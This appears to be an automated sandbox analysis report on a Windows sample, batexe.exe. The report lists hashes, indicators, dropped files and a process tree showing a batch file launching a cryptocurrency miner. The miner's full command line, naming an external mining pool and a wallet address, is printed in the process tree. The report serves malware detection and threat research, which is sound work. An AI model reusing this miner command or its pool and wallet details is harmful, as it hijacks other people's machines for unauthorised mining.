73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
302s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
21/02/2024, 02:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4524	b2e.exe
4392	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4392	cpuminer-sse2.exe
4392	cpuminer-sse2.exe
4392	cpuminer-sse2.exe
4392	cpuminer-sse2.exe
4392	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4696-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4696 wrote to memory of 4524	4696	batexe.exe	75
PID 4696 wrote to memory of 4524	4696	batexe.exe	75
PID 4696 wrote to memory of 4524	4696	batexe.exe	75
PID 4524 wrote to memory of 440	4524	b2e.exe	76
PID 4524 wrote to memory of 440	4524	b2e.exe	76
PID 4524 wrote to memory of 440	4524	b2e.exe	76
PID 440 wrote to memory of 4392	440	cmd.exe	79
PID 440 wrote to memory of 4392	440	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4696
- C:\Users\Admin\AppData\Local\Temp\C30.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\C30.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\C30.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\122B.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:440
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\122B.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\C30.tmp\b2e.exe

Filesize
4.0MB

MD5
2aa9b9b80cf0dba0a91119508ca46b6f

SHA1
1c4cdec90b92f80d4770740cba70e3161a15c385

SHA256
5b6faba4c449640574c3c99762ca082f3ebf0b529bc233147bbbb786e9cc11fe

SHA512
584c880db5d110a2f3a209e017d255af6644ddee24f3ded096ee100d2ea467e2028f4fbddabddf974b21b1ef027f1f60605e669747c80edf0e5c1453533a9c14

Download Submit
C:\Users\Admin\AppData\Local\Temp\C30.tmp\b2e.exe

Filesize
3.8MB

MD5
45678fec0d3aea0ea65a8fb02933f7fd

SHA1
1bff299aa5a44f04fe18d25f5ed719431e54b0c0

SHA256
d60260441abf9632fc5653ab43190d44c4bcf20ff7c1846669a5afdbc169b147

SHA512
c9e28836bef3a53ecbea3599fa99e8cc045c0c938b0a3aad958b64ba4fc139c663ce12f68ba54338730158e65e9dab4ba38131937ad060dc29459e83643617b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
204KB

MD5
c34b114a676206518bd48f3a48dceafb

SHA1
68f4bc4bdb0f75ccc20efe963bcb83ab7591a498

SHA256
478c0d14e358f59ad8beade422c93ea4cf91af3e14f6749e5648dc59723e3171

SHA512
b2369c96a6d7dcf23e2edbc2680c5eca0284879131ae1de9b85ec0fa5767f22aa358165fa3743a31f91b76f50a85908b9dcaddcfcf5e3b23a1bec6122097898a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
183KB

MD5
6b4ebe4899b47d7d5216eb8c095828d6

SHA1
d43667122886db9d82aa063aa7e2bf4d5f7bd446

SHA256
f4f8babf4b352c053dc3eb445a5b88b730cc334a24d705e6b0eedb69acad3e5e

SHA512
18958ce106b1ae8763ff43cd1c30f694e26f81e35ce442a339144269e14827e6ef7d67924b7f9bff9af5aedae13928a9f691faef4c46712f176f49bbdbbd3ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
313KB

MD5
42b5c85344a9f0fa8728b3ec651c2e72

SHA1
a465cc3fa77e14162c0fcda7c2ad57bf4f2b68cc

SHA256
18af1cd3094902e36c7d4886ed1ba57bf2d1754b324f49129204cec8c037a5a3

SHA512
c4f45db020a0e50ad64077a0f02db3e09e19a646daad4532927efd725406ffae666f504021e09f003da3eb7a4d0b05bea7e6659769aad5f552ed89cc5c956edf

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
213KB

MD5
eb0407ce86909dd8b189e28888c36efe

SHA1
fb26424bd73970c280d82145a66f6e805968c758

SHA256
a4a20c25f0bb5f11e94c1aab8dcf6c9540cb539d212b71ea15d1c5990b35a52d

SHA512
e82c3394df2c08ecbd31e8e0b18ad29280d5aa1792f41ff4159ab2644e20ed520ed1cd706e476a5e09ed269ef0e2d970c7ccaf52aa41a34071ef3de96d830461

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
176KB

MD5
51c7b0c5ef4f0c073c0c41f16458639e

SHA1
f5bb3a32097997fd6946ed250a78a89023df14bd

SHA256
d702b17bfd541bae0ac05859969563a2367fa3b97361535caecee4f144fd9acd

SHA512
aa62fe76c6e7011378ed92e9f8cd57ef8f5e4dbdc43ae8da8ed39ccc6450d8c20554055d60883200c985a983a341910abbd970c7f79a5822f778639bb60183b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
192KB

MD5
625f906456510afaf916dd0384d76eee

SHA1
66c56574aff02fb199caa60ab71ca9f1c9e7fc92

SHA256
27baaef233592b03722c7d64c26d2270c0300ffb8e7f08a8e0d65212af4b848d

SHA512
041399c5ddc614d8b1a359238df8fb09258c95a0013e5139dbf4093b892395f5f78fa31fbecfee92966c5e78a5c5894005c98e559b8b5735ecf9c1995df51b17

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
284KB

MD5
25b4e624e098c2065aa252b71918367e

SHA1
5f96a4aa302b4881c5c1ea0194f1a499dd37b412

SHA256
9b7dc6135c16ed7bf0b275e19b0dc0e15bb0ff98585a49a4a7a49459e8b5921c

SHA512
2bc2f370fc7590adb6d23731ad5994c76c6eff0b3425242788186ada18a69177caaeda23552d0a65f5c98106e4267897e2023f1ecf88f21edecf554350706794

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
173KB

MD5
b36c95786c2d788447155f25e8647057

SHA1
f74a729af3b459bc1e141a73e28ce04c6b9a1759

SHA256
795faa758c12cf9012f59d7927b5ec8f2c1a9b18dfc646d9af42d6a83e18c24d

SHA512
ca868825005dd9a10a27bd9ce6d333966b4c474e0daf2161eb2cb1c75ebd22164e97c145c996a14add5fbd7d5d291a5da8d9123aae35565b889c573fa7950347

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
56KB

MD5
c5340745094bd20e83bb0ef48fd43004

SHA1
1788594c6e67d7e0bcbd8b261512715eb600efc4

SHA256
6d424cb35973279a2669063b94cede8f120a66d8f25caf8e38b2babdcb373588

SHA512
38ff6c27384ebd890331f74476279bf06bc0768c6996507512b099c5dcb1d73ad8447a4980c42f1e7fa6ddb501540c40956fe99419c914863e4e451d2cc9f44b

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
58KB

MD5
f7fc257d8c88c13ed66e9b32e76b8d0e

SHA1
481b45d12c102536916a47160dbd49617b6d81f0

SHA256
6f3b32e241a66989c0d71e8784e2a8c24fa452c4d5deae174cdc625ce0c70ca3

SHA512
c2f0191114e94247bd783db565c93716ef616a597a34e3af101da90a3d805aebac83a7a24309695138002a7e59cdeda3c0ad57f4cbb00ed07898a17f210590d6

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
68KB

MD5
5bf2d779b4c60f6039feeeef7c1ed0c5

SHA1
87be6d1195ba3654c0271a0fade0f3c91a0f33b4

SHA256
86084874eecd295d3f6bd5ed5c0611ca9bc7cc42c35c1a2b2da4212d688c298e

SHA512
959bd75e212d72fb989c95281ae996a8155aa7d50f45462aac49372cfb80d694c764d8ca9b921635389e1940523184cc3228f5b40d2c23f85d9e704dc39313d5

Download Submit
memory/4392-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4392-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4392-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4392-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4392-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4392-43-0x0000000070ED0000-0x0000000070F68000-memory.dmp

Filesize
608KB

Download
memory/4392-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/4392-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4392-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4392-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4392-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4392-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4392-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4392-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4392-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4392-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4392-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4524-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4524-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4696-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download